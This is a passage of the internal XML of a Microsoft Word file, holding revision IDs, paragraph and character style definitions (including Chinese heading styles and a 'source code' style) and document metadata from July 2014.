    <w:rsid w:val="006F2FAA"/>
    <w:rsid w:val="00713D6E"/>
    <w:rsid w:val="00715D5C"/>
    <w:rsid w:val="0077195E"/>
    <w:rsid w:val="00797CAB"/>
    <w:rsid w:val="007A4663"/>
    <w:rsid w:val="007A5E5A"/>
    <w:rsid w:val="007D45FD"/>
    <w:rsid w:val="007F3E90"/>
    <w:rsid w:val="00877283"/>
    <w:rsid w:val="0088302A"/>
    <w:rsid w:val="0089008B"/>
    <w:rsid w:val="00891590"/>
    <w:rsid w:val="00892118"/>
    <w:rsid w:val="008C2251"/>
    <w:rsid w:val="008F7AFC"/>
    <w:rsid w:val="009034D5"/>
    <w:rsid w:val="00924041"/>
    <w:rsid w:val="0092589C"/>
    <w:rsid w:val="00930066"/>
    <w:rsid w:val="009800D2"/>
    <w:rsid w:val="009B47FA"/>
    <w:rsid w:val="009F2751"/>
    <w:rsid w:val="00A64130"/>
    <w:rsid w:val="00A66860"/>
    <w:rsid w:val="00A94676"/>
    <w:rsid w:val="00AB32B7"/>
    <w:rsid w:val="00AC3196"/>
    <w:rsid w:val="00B05E77"/>
    <w:rsid w:val="00B1716E"/>
    <w:rsid w:val="00BA339D"/>
    <w:rsid w:val="00BD4547"/>
    <w:rsid w:val="00BF4515"/>
    <w:rsid w:val="00C04F9C"/>
    <w:rsid w:val="00C625D0"/>
    <w:rsid w:val="00CA49AE"/>
    <w:rsid w:val="00CC5544"/>
    <w:rsid w:val="00D41D4A"/>
    <w:rsid w:val="00D45119"/>
    <w:rsid w:val="00D50A1E"/>
    <w:rsid w:val="00D673D0"/>
    <w:rsid w:val="00DB2236"/>
    <w:rsid w:val="00DE54D1"/>
    <w:rsid w:val="00E63480"/>
    <w:rsid w:val="00E8218C"/>
    <w:rsid w:val="00E932FC"/>
    <w:rsid w:val="00EE4098"/>
    <w:rsid w:val="00F2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AE7DCF-B7DB-4696-89A1-ED081724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F7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E821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25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21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1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18C"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="1Char">
    <w:name w:val="标题 1 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="1"/>
    <w:rsid w:val="00E8218C"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体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2589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C326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Normal (Web)"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="009F2751"/>
    <w:pPr>
      <w:ind w:firstLine="480"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="a7">
    <w:name w:val="Hyperlink"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B1716E"/>
    <w:rPr>
      <w:strike w:val="0"/>
      <w:dstrike w:val="0"/>
      <w:color w:val="2D64B3"/>
      <w:u w:val="none"/>
      <w:effect w:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="3Char">
    <w:name w:val="标题 3 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="3"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00C625D0"/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sourcecode">
    <w:name w:val="source code"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="sourcecodeChar"/>
    <w:qFormat/>
    <w:rsid w:val="00203A6B"/>
    <w:pPr>
      <w:shd w:val="solid" w:color="D9D9D9" w:themeColor="background1" w:themeShade="D9" w:fill="FFFFFF" w:themeFill="background1"/>
      <w:spacing w:line="200" w:lineRule="exact"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="YaHei Consolas Hybrid"/>
      <w:sz w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="sourcecodeChar">
    <w:name w:val="source code Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="sourcecode"/>
    <w:rsid w:val="00203A6B"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="YaHei Consolas Hybrid" w:hAnsi="宋体" w:cs="宋体"/>
      <w:kern w:val="0"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="24"/>
      <w:shd w:val="solid" w:color="D9D9D9" w:themeColor="background1" w:themeShade="D9" w:fill="FFFFFF" w:themeFill="background1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="zhengwensuojin">
    <w:name w:val="zhengwen suojin"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="zhengwensuojinChar"/>
    <w:qFormat/>
    <w:rsid w:val="00DE54D1"/>
    <w:pPr>
      <w:ind w:firstLineChars="200" w:firstLine="200"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="zhengwensuojinChar">
    <w:name w:val="zhengwen suojin Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="zhengwensuojin"/>
    <w:rsid w:val="00DE54D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curityfoc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43BC-9819-48F7-8DBE-D6C61AC3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2383</Words>
  <Characters>13586</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>113</Lines>
  <Paragraphs>31</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company>xTarget Computer Solutions Lab.</Company>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>1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deep -</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>ismdeep -</cp:lastModifiedBy>
  <cp:revision>72</cp:revision>
  <cp:lastPrinted>2014-07-05T16:37:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2014-07-05T15:16:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2014-07-06T00:04:00Z</dcterms:modified>
</cp:coreProperties>
</file>